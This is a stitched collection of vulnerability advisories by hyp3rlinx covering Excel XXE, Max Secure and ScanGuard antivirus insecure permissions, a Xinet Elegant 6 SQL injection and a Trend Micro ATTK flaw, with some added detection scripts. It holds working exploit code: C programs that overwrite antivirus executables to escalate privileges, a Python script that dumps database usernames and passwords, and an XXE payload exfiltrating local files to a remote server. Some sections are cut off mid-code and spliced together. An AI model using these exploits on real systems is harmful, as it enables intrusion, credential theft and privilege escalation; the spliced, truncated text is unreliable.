[POC Video URL]
https://www.youtube.com/watch?v=QOZlwzsbPrk



[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: 3/24/2017
MSRC sent me a link to "Definition of a Security Vulnerability".
The product is also no longer supported.
December 1, 2019 : Public Disclosure





[FD] Microsoft Excel 2016 v1901 / Import Error XML External Entity Injection

2019-12-03 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Excel 2016 v1901

Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS,
Android and iOS.
It features calculation, graphing tools, pivot tables, and a macro
programming language called Visual Basic for Applications.


[CVE]
N/A


[Vulnerability Type]
Error Import Based XML External Entity Injection


[Security Issue]
Excel's "query from file" feature is vulnerable to "error" based XML
External Entity attacks if the user chooses the "Import as Html page"
functionality after receiving errors importing a specially crafted XML
file.

This can result in remote data exfiltration; user interaction is required
to exploit this vulnerability.

Tested successfully on Windows 10 with .NET Framework version v4.0.30319.

C:\>dir /b %windir%\Microsoft.NET\Framework\v*
v4.0.30319


[Exploit/POC]
Create a new ".xlsx" file, then go to the Data tab and choose 'New Query /
From File / From XML'.

1) You will get an error like:

"Error:

Unable to connect

We encountered an error while trying to connect."

2) Excel will then give you the option to 'Edit' and import the file as an
'Html Page' from the drop-down menu.

Once the user chooses to import as HTML, the XXE attack succeeds and local
data is exfiltrated to the remote server, as seen in the attacker's web
server log, e.g.:

127.0.0.1 - - [05/Mar/2019 15:31:16] "GET
/?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=
EGA80WOA.FO
/1.1" 200 -


Malicious XML file to load as New Data Query

"test.xml"



http://127.0.0.1:8000/payload.dtd'>
%dtd;]>
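Added example, not taken from any of the three XXE advisories above (Windows Media Center .mcl, Visual Studio 2008 and Excel 2016): they share one payload shape, an external parameter entity that pulls a DTD which in turn nests a SYSTEM entity embedding a file:// entity in an outbound URL. The Python below scans XML or DTD text for exactly those constructs, and decodes the exfiltrated content out of the attacker-side access-log line that the Excel advisory shows. The sample XML, DTD and log line are constructed to match the advisories' shape; the win.ini path is an assumption (the page only shows win.ini content arriving at the server).

```python
import re
from typing import List
from urllib.parse import unquote, urlparse

# External identifier declarations, general or parameter (% name):
#   <!ENTITY % dtd SYSTEM "http://...">   <!ENTITY x PUBLIC "id" "uri">
EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?([\w.-]+)\s+(SYSTEM|PUBLIC)\s+(['\"])(.*?)\4", re.I | re.S)
# Internal-value declarations, whose value may nest another declaration.
INT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?([\w.-]+)\s+(['\"])(.*?)\3", re.I | re.S)
PE_REF_RE = re.compile(r"%([\w.-]+);")

# Constructed samples shaped like the advisories' payloads.
SAMPLE_XML = """<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;
]>
<data>x</data>
"""
SAMPLE_DTD = """<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
"""
SAMPLE_LOG = ('127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app'
              '%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon HTTP/1.1" 200 -')


def xxe_indicators(text: str) -> List[str]:
    """Describe every construct that would make a resolving parser fetch or leak data."""
    findings: List[str] = []
    for pct, name, kind, _q, uri in EXT_ENTITY_RE.findall(text):
        scheme = urlparse(uri).scheme.lower() or "relative"
        findings.append(f"{'parameter' if pct else 'general'} entity '{name}' "
                        f"loads {kind.upper()} resource {uri!r} (scheme: {scheme})")
    for pct, name, _q, value in INT_ENTITY_RE.findall(text):
        refs = PE_REF_RE.findall(value)
        if refs or "<!ENTITY" in value.upper():
            findings.append(f"entity '{name}' nests a declaration referencing {refs} "
                            "(out-of-band exfiltration pattern)")
    # References left after stripping the declarations are the expansions that fire.
    stripped = EXT_ENTITY_RE.sub("", INT_ENTITY_RE.sub("", text))
    for ref in PE_REF_RE.findall(stripped):
        findings.append(f"parameter entity %{ref}; expanded inside the DTD subset")
    return findings


def is_xxe_suspect(text: str) -> bool:
    return bool(xxe_indicators(text))


LOG_REQ_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')


def decode_exfil_request(log_line: str) -> str:
    """Recover the leaked file content from the query string of an exfil GET."""
    m = LOG_REQ_RE.search(log_line)
    if not m:
        return ""
    return unquote(m.group(1).partition("?")[2])


if __name__ == "__main__":
    for sample in (SAMPLE_XML, SAMPLE_DTD):
        for finding in xxe_indicators(sample):
            print("[!]", finding)
    print(repr(decode_exfil_request(SAMPLE_LOG)))
```

Run the scanner over .mcl, .snippet/.asm/.xml and query-source files before they are opened by a DTD-resolving consumer; a DOCTYPE with any SYSTEM/PUBLIC identifier or any parameter entity is enough to quarantine the file, since none of the legitimate inputs for these products need either.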




[Network Access]
Local


[Severity]
Medium


[Disclosure Timeline]
Vendor Notification: May 10, 2019
MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security
Release.
Engineering Team may or may not fix in a future version of the release."
November 30, 2019 : Public Disclosure





[FD] Max Secure Anti Virus Plus - 19.0.4.020 / CVE-2019-19382 Insecure Permissions

2019-11-29 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec


[Vendor]
www.maxpcsecure.com


[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020

File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe


[Vulnerability Type]
Insecure Permissions


[CVE Reference]
CVE-2019-19382


[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has insecure permissions on its
installation directory.
Local attackers or malware running at low integrity can replace a .exe
or .dll file to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F


[Affected Component]
Permissions on installation directory


[Exploit/POC]
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
  DWORD dwAttrib = GetFileAttributes(szPath);
  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

int main(void){

  /* First run: copy the legitimate UI binary aside (666.tmp marks it as disabled). */
  if(!FileExists(DISABLED_TARGET)){
    CopyFile(TARGET, TMP, FALSE);
    Sleep(1000);
    CopyFile(TMP, DISABLED_TARGET, FALSE);
    printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
    Sleep(1000);
    printf("[+] Disabled MaxSDUI.exe ...\n");
    Sleep(300);
  }else{
    PWNED=TRUE;
  }

  if(!PWNED){
    /* Overwrite the vendor EXE with this PoC; the weak ACL lets any user do it. */
    char fname[MAX_PATH];
    DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
    if (size){
      printf("[+] Copying exploit to vuln dir...\n");
      Sleep(1000);
      CopyFile(fname, TARGET, FALSE);
      printf("[+] Replaced legit Max Secure EXE...\n");
      Sleep(2000);
      printf("[+] Done!\n");
      MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
      Sleep(1000);
      exit(0);
    }
  }else{
    /* Second run, now executing in place of MaxSDUI.exe: clean up the copy. */
    if(FileExists(TMP)){
      remove(TMP);
    }
    printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
    printf("[+] hyp3rlinx\n");
    system("pause");
  }
  return 0;
}


[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure





[FD] NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 / Pre-Auth SQL Injection 0Day

2019-11-29 Thread hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt
[+] ISR: ApparitionSec


[Vendor]
www.napc.com


[Product]
Xinet Elegant 6 Asset Library Web Interface v6.1.655

Web based interface for xinet asset management solution.


[Vulnerability Type]
Pre-Auth SQL Injection


[CVE Reference]
CVE-2019-19245


[Security Issue]
NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows
pre-authentication error-based SQL injection via the /elegant6/login
LoginForm[username] field when double quotes are used. The vulnerable
version seems to be old, but it may still be possible to find it deployed,
as I have.

Vulnerable parameter: LoginForm[username] (POST method).


[Exploit/POC]
import requests,time,re,sys,argparse

#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#==
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS:
#LoginForm[password]=1&LoginForm[rememberMe]=0&LoginForm[username]=SQL
#SQL INJECTION VULN PARAM --> LoginForm[username]
#
#Python 2 script; the archived copy ends mid-way through parse_args().

IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False


def vuln_ver_chk():
    global IP, PORT
    TARGET = "http://"+IP+":"+PORT+"/elegant6/login"
    response = requests.get(TARGET)
    if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content):
        print "[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655."
        return True
    print "[!] Version not vulnerable :("
    return False


def sql_inject_request(SQL):
    global IP, PORT
    URL = "http://"+IP+":"+PORT+"/elegant6/login"

    tmp=""
    headers = {'User-Agent': 'Mozilla/5.0'}
    payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
    session = requests.Session()

    res = session.post(URL,headers=headers,data=payload)
    idx = res.content.find('CDbCommand')  # Start of SQL Injection Error in response
    idx2 = res.content.find('key 1')      # End of SQL Injection Error in response

    return res.content[idx : idx2+3]


#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
    global k,j
    while j < NUM_INJECTS:
        j+=1
        if k !=1:
            k+=1
        return str(j)+','+str(k)


def tidy_up(results):
    global CREDS
    idx = results.find("'")
    if idx != -1:
        idx2 = results.rfind("'")
        if not CREDS:
            return results[idx + 1: idx2 -2]
        else:
            return results[idx + 2: idx2]


def breach(i):
    global k,j,NUM_INJECTS,SHOW_SQL_ERROR
    result=""

    #Dump Usernames & Passwords
    if CREDS:
        if i % 2 == 0:
            target='username'
        else:
            target='password'

        SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))'
             'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -')

        if not SHOW_SQL_ERROR:
            result = tidy_up(sql_inject_request(SQL))
        else:
            result = sql_inject_request(SQL)+"\n"
        print "[+] Dumping "+target+": "+result

    #Dump Tables
    if TABLES:
        while j < NUM_INJECTS:
            nums = inc()
            SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
                 'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')

            if not SHOW_SQL_ERROR:
                result = tidy_up(sql_inject_request(SQL))
            else:
                result = sql_inject_request(SQL) + "\n"

            print "[+] Dumping Table... " +result
            time.sleep(0.3)


def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ip_address", help=".")
    parser.add_argument("-p", "--port", help="Port, Default is 80")
    parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
    parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
    parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.")
    parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.")
    parser.add_arg
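Added example, not part of the exploit above: the extraction step of the error-based technique isolated in Python 3. The page's payload forces a duplicate-key error whose reported key is the leaked value wrapped in a 0x2b ("+") or 0x3a (":") separator plus the colliding digit from floor(rand(0)*2); the code below cuts the value out of that MySQL 1062 message as surfaced through CDbCommand and walks LIMIT offsets until a response carries no error. The login endpoint is replaced by a constructed stand-in so it runs offline; the user list and error strings are made up.

```python
import re
from typing import Callable, List, Optional

# MySQL 1062 text as surfaced through Yii's CDbCommand exception message.
DUP_ENTRY_RE = re.compile(r"Duplicate entry '(?P<entry>.*?)' for key", re.S)


def build_creds_payload(column: str, offset: int) -> str:
    """The advisory's username/password probe for one row (offset = LIMIT start)."""
    return ('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'
            f"{column})) from user limit {offset}, 1),floor(rand(0)*2))x from user "
            'group by x)a)-- -')


def extract_leaked_value(error_text: str, prefix: str = "+", suffix: str = "") -> Optional[str]:
    """Return the value carried inside the duplicate-key error, or None when the
    response holds no such error (no more rows, or the injection did not fire).

    The reported key is <prefix><value><suffix><0|1>: floor(rand(0)*2) appends
    the colliding group digit, and the 0x2b / 0x3a separator the payloads insert
    lets the value be cut out without guessing where it starts.
    """
    m = DUP_ENTRY_RE.search(error_text)
    if not m:
        return None
    entry = m.group("entry")
    if entry and entry[-1] in "01":
        entry = entry[:-1]
    if suffix and entry.endswith(suffix):
        entry = entry[: -len(suffix)]
    if prefix and entry.startswith(prefix):
        entry = entry[len(prefix):]
    return entry


def dump_column(send: Callable[[str], str], column: str, max_rows: int = 20) -> List[str]:
    """Walk LIMIT offsets until a response carries no duplicate-entry error."""
    values: List[str] = []
    for offset in range(max_rows):
        value = extract_leaked_value(send(build_creds_payload(column, offset)))
        if value is None:
            break
        values.append(value)
    return values


# Constructed stand-in for the vulnerable login endpoint: answers each probe
# with the error text a Yii/MySQL stack would return for that row.
FAKE_USERS = ["admin", "backup"]


def fake_send(payload: str) -> str:
    m = re.search(r"limit (\d+), 1", payload)
    offset = int(m.group(1)) if m else 0
    if offset >= len(FAKE_USERS):
        return "<html><title>Login</title></html>"
    return ("CDbCommand failed to execute the SQL statement: SQLSTATE[23000]: "
            "Integrity constraint violation: 1062 Duplicate entry "
            f"'+{FAKE_USERS[offset]}1' for key 1")


if __name__ == "__main__":
    print(dump_column(fake_send, "username"))
```

Against a real target, `send` would be the POST of LoginForm[username] that the exploit's sql_inject_request() performs; for the table dump the separator is ":" so call extract_leaked_value(text, prefix="", suffix=":"). The defensive point is the same one the error message makes: the login handler echoes the raw database exception to an unauthenticated client, which is what turns a blind injection into a one-request-per-value oracle.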

[FD] ScanGuard Antivirus (latest version) / Insecure Permissions

2019-11-15 Thread hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec


[Vendor]
https://www.scanguard.com


[Product]
ScanGuard Antivirus
ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d

Complete Antivirus & Security Software


[Vulnerability Type]
Insecure Permissions


[CVE Reference]
CVE-2019-18895


[Affected Product Code Base]
ScanGuard Antivirus - latest


[Affected Component]
Permissions on installation directory


[Attack Type]
Local


[Impact Code execution]
true


[Impact Escalation of Privileges]
true


[Impact Information Disclosure]
true


[Attack Vectors]
Low integrity malware or non-privileged user replaces an executable to gain
Admin privileges.


[Reference]
https://support.scanguard.com/en/kb/22/upgrades-available


[Security Issue]
ScanGuard through 2019-11-12 on Windows has insecure permissions on the
installation directory, leading to privilege escalation via a Trojan horse
executable file.

The product sets weak access control restrictions, as permissions are set
to Full Control for the Everyone group.
This can allow low integrity malware to replace ScanGuard executables.


C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
                                      Everyone:(OI)(CI)(ID)F
                                      NT SERVICE\TrustedInstaller:(ID)F
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                      NT AUTHORITY\SYSTEM:(ID)F
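Added example (not from either advisory) covering the Max Secure cacls output above and this ScanGuard listing: a Python parser for cacls/icacls-style ACL dumps that reports every ACE granting a low-privileged principal write, modify or full control on a file or directory, which is the precondition both PoCs rely on. The listings are constructed in the two tools' layouts, with continuation lines belonging to the path above them; the principal and rights sets are assumptions to tune.

```python
import re
from typing import List, Set, Tuple

# Principals that any local user (or low-privileged malware) runs as.
LOW_PRIV = {"everyone", "builtin\\users", "users", "nt authority\\authenticated users",
            "authenticated users", "nt authority\\interactive"}
# Simple rights that allow replacing a file (cacls/icacls letters) and the
# specific rights behind them.
WRITE_SIMPLE = {"F", "M", "W", "D"}
WRITE_SPECIFIC = {"GA", "GW", "WD", "AD", "WDAC", "WO", "DC", "DE"}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I", "ID"}
KNOWN_DOMAINS = ("NT AUTHORITY", "NT SERVICE", "BUILTIN", "APPLICATION PACKAGE AUTHORITY")
BARE_PRINCIPALS = ("Everyone", "CREATOR OWNER", "CREATOR GROUP")

# Constructed listings, modelled on the two advisories' output.
SAMPLE_CACLS = r"""C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F
C:\Program Files\Good Product\good.exe NT AUTHORITY\SYSTEM:(ID)F
                                       BUILTIN\Administrators:(ID)F
                                       BUILTIN\Users:(ID)R
"""
SAMPLE_ICACLS = r"""C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(F)
                                      Everyone:(OI)(CI)(F)
                                      NT SERVICE\TrustedInstaller:(F)
                                      NT AUTHORITY\SYSTEM:(OI)(CI)(F)
"""


def split_path_and_principal(left: str) -> Tuple[str, str]:
    """Split 'C:\\path with spaces DOMAIN\\user name' into (path, principal).

    Walks word by word from the right and prefers a well-known multi-word
    domain over a generic one-word domain, so 'NT AUTHORITY\\X' is not cut to
    'AUTHORITY\\X'. A backslash after the domain separator means we have run
    into the path, so the search stops there.
    """
    words = left.split()
    generic = ("", "")
    for i in range(len(words) - 1, -1, -1):
        cand = " ".join(words[i:])
        if cand in BARE_PRINCIPALS:
            return " ".join(words[:i]), cand
        domain, sep, rest = cand.partition("\\")
        if not sep:
            continue
        if "\\" in rest:
            break
        if domain in KNOWN_DOMAINS:
            return " ".join(words[:i]), cand
        if " " not in domain:
            generic = (" ".join(words[:i]), cand)
    return generic


def parse_rights(spec: str) -> Tuple[Set[str], bool]:
    """'(OI)(CI)(ID)F' or '(OI)(CI)(F)' -> ({'F'}, deny?) with inheritance flags dropped."""
    tokens = re.findall(r"\(([^)]*)\)", spec)
    tail = re.sub(r"\([^)]*\)", "", spec).strip()
    rights: Set[str] = set()
    deny = False
    for tok in tokens + ([tail] if tail else []):
        for part in tok.split(","):
            part = part.strip().upper()
            if part == "DENY":
                deny = True
            elif part and part not in INHERIT_FLAGS:
                rights.add(part)
    return rights, deny


def parse_acl_listing(text: str) -> List[Tuple[str, str, Set[str], bool]]:
    """(path, principal, rights, deny) per ACE; the path carries over continuation lines."""
    entries = []
    current_path = ""
    for raw in text.splitlines():
        left, sep, spec = raw.strip().rpartition(":")
        if not sep or not spec:
            continue
        path_part, principal = split_path_and_principal(left.strip())
        if not principal:
            continue
        if path_part:
            current_path = path_part
        rights, deny = parse_rights(spec)
        entries.append((current_path, principal, rights, deny))
    return entries


def weak_aces(text: str) -> List[str]:
    """ACEs that let a low-privileged principal modify a file or directory."""
    out = []
    for path, principal, rights, deny in parse_acl_listing(text):
        if not deny and principal.lower() in LOW_PRIV and rights & (WRITE_SIMPLE | WRITE_SPECIFIC):
            out.append(f"{path}: {principal} -> {','.join(sorted(rights))}")
    return out


if __name__ == "__main__":
    for listing in (SAMPLE_CACLS, SAMPLE_ICACLS):
        for finding in weak_aces(listing):
            print("[!]", finding)
```

Feed it the output of `icacls "C:\Program Files\<product>" /t` (or the cacls form the Max Secure advisory uses) from a build or baseline host; any line it reports is a location where the rename-and-replace trick in the PoCs below works without elevation.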


[Exploit/POC]

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"

/* ScanGuard EoP
   PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
  DWORD dwAttrib = GetFileAttributes(szPath);
  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

int main(void){

  /* First run: rename the legitimate EXE out of the way (~.conf marks it as disabled). */
  if(!FileExists(DISABLED_TARGET)){
    rename(TARGET, DISABLED_TARGET);
    printf("[+] ScanGuard Antivirus EoP PoC\n");
    Sleep(300);
    printf("[+] Disabled ScanGuard.exe ...\n");
    Sleep(300);
  }else{
    PWNED=TRUE;
  }

  char fname[MAX_PATH];
  char newLoc[]=TARGET;

  DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
  if (size){
    if(!PWNED){
      /* Drop this PoC in place of ScanGuard.exe; Everyone:(F) on the directory allows it. */
      printf("[+] Copying exploit to vuln dir...\n");
      Sleep(300);
      CopyFile(fname, newLoc, FALSE);
      printf("[+] Replaced legit ScanGuard...\n");
      Sleep(300);
      printf("[+] Done!\n");
      Sleep(300);
      MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk");
      Sleep(2000);
      exit(0);
    }else{
      /* Second run, now executing as ScanGuard.exe: clean up. */
      if(FileExists("ScamGuard.lnk")){
        system("DEL /f ScamGuard.lnk");
      }
      printf("[+] ScamGuard PWNED!!!\n");
      printf("[+] By hyp3rlinx\n");
      system("pause");
    }
  }
  return 0;
}


[Disclosure Timeline]
Vendor Notification: September 16, 2019
Received vendor acknowledgement: September 16, 2019
Second contact follow up: September 29, 2019
No more vendor replies.
November 12, 2019 : Public Disclosure





[FD] Trend Micro Anti-Threat Toolkit (ATTK) <= v1.62.0.1218 Remote Code Execution 0day CVE-2019-9491

2019-10-22 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
[+] ISR: Apparition Security


[Vendor]
www.trendmicro.com


[Product]
Trend Micro Anti-Threat Toolkit (ATTK)
1.62.0.1218 and below

Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and
clean infections.
It can be used to perform system forensic scans and clean the
following infection types:

General malware infection
Master boot record Infection
CIDOX/ RODNIX infection
Rootkit infection
Zbot infection
Cryptolocker infection
etc..


[Vulnerability Type]
Remote Code Execution


[CVE Reference]
CVE-2019-9491


[Security Issue]
Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary
.EXE files if a malware author
happens to use the vulnerable naming convention of "cmd.exe" or
"regedit.exe" and the malware can be
placed in the vicinity of the ATTK when a scan is launched by the end user.

Since the ATTK is signed by a verified publisher and therefore assumed
trusted, any MOTW security warnings
are bypassed if the malware was internet downloaded; also it can
become a persistence mechanism, as
each time the Anti-Threat Toolkit is run so can an attacker's malware.

Standalone affected components of ATTK and other integrations (e.g.
WCRY Patch Tool, OfficeScan Toolbox, etc.)

attk_collector_cli_x64.exe
Hash: e8503e9897fd56eac0ce3c3f6db24fb1

TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f

attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed


[References]
https://success.trendmicro.com/solution/000149878
*All versions of the ATTK have been updated with the newer version.
Anti-Threat Toolkit (ATTK) 1.62.0.1223


[Exploit/POC]
Compile an .EXE using below "C" code and use naming convention of
"cmd.exe" or "regedit.exe".
Run the Anti-Threat Toolkit and watch the ATTK console to see the
Trojan file get loaded and executed.

#include <windows.h>   /* WinExec */
#include <stdio.h>     /* puts */

int main(void){
   puts("Trend Micro Anti-Threat Toolkit PWNED!");
   puts("Discovery: hyp3rlinx");
   puts("CVE-2019-9491\n");
   WinExec("powershell", 0);   /* nCmdShow 0 = SW_HIDE */
   return 0;
}


[POC Video URL]
https://www.youtube.com/watch?v=HBrRVe8WCHs


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: September 9, 2019
Vendor confirms vulnerability: September 25, 2019
Vendor requests to coordinate advisory: September 25, 2019
October 19, 2019 : Public Disclosure




hyp3rlinx

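Added example (not part of the advisory and not Trend Micro's tooling): a small hunt script a defender could run after reading the above, looking for binaries named like the ones ATTK resolves by bare name (cmd.exe, regedit.exe) that sit outside the system directory or do not match a known-good hash. The trusted-directory set, the known-good hash table and the sample directory tree are constructed for this demo; on a production host they would come from %SystemRoot% and a hash baseline.

```python
import hashlib
import os
import tempfile

# System binaries the advisory says ATTK will load by bare name from its own
# vicinity. On a real host, add any other name the scanner is seen resolving.
WATCHED_NAMES = {"cmd.exe", "regedit.exe"}

# Directories (relative to the scanned root, lower-case, "/"-separated) where a
# copy of a watched binary is expected. Constructed for this demo: on a real
# Windows host these would be resolved from %SystemRoot% instead.
TRUSTED_DIRS = {"windows/system32", "windows"}


def sha256_of(path):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_masquerading_binaries(root, known_good):
    """Walk `root` and report every file named like a watched system binary
    that sits outside TRUSTED_DIRS or whose SHA-256 is not in `known_good`
    (a dict mapping lower-case basename -> set of trusted hex digests).
    Both checks are recorded per finding so an analyst can tell a merely
    misplaced copy from a different binary."""
    findings = []
    for dirpath, _subdirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/").lower()
        for name in files:
            lname = name.lower()
            if lname not in WATCHED_NAMES:
                continue
            full = os.path.join(dirpath, name)
            digest = sha256_of(full)
            in_trusted_dir = rel_dir in TRUSTED_DIRS
            hash_ok = digest in known_good.get(lname, set())
            if in_trusted_dir and hash_ok:
                continue
            findings.append({
                "path": full,
                "in_trusted_dir": in_trusted_dir,
                "hash_ok": hash_ok,
                "sha256": digest,
            })
    return findings


def build_demo_tree():
    """Constructed sample layout: a legitimate cmd.exe under windows/system32
    and a planted cmd.exe next to a (fictional) ATTK working folder.
    Returns (root, known_good)."""
    root = tempfile.mkdtemp(prefix="attk_hunt_")
    legit = os.path.join(root, "windows", "system32")
    planted = os.path.join(root, "Users", "victim", "Downloads", "ATTK")
    os.makedirs(legit)
    os.makedirs(planted)
    with open(os.path.join(legit, "cmd.exe"), "wb") as fh:
        fh.write(b"MZ legit cmd placeholder")        # constructed content
    with open(os.path.join(planted, "cmd.exe"), "wb") as fh:
        fh.write(b"MZ planted binary placeholder")   # constructed content
    with open(os.path.join(planted, "attk_log.txt"), "wb") as fh:
        fh.write(b"not a watched name, must be ignored")
    known_good = {"cmd.exe": {sha256_of(os.path.join(legit, "cmd.exe"))}}
    return root, known_good


def demo():
    """Build the sample tree and return the findings over it."""
    root, known_good = build_demo_tree()
    return find_masquerading_binaries(root, known_good)


if __name__ == "__main__":
    for f in demo():
        print("[!] %s  trusted_dir=%s  hash_ok=%s" % (f["path"], f["in_trusted_dir"], f["hash_ok"]))
```

Only the planted copy next to the ATTK folder is reported; the copy under windows/system32 is skipped because it is both in a trusted directory and matches the baseline hash.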


[FD] NtFileSins v2.1 / Windows NTFS Privileged File Access Enumeration Tool

2019-09-09 Thread hyp3rlinx
Fixed a bug in the save report logic.

from subprocess import Popen, PIPE
import sys,argparse,re

# NtFileSins v2.1
# Fixed: save() logic to log report in case no Zone.Identifiers found.
# Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
#               2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message"  OR  "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
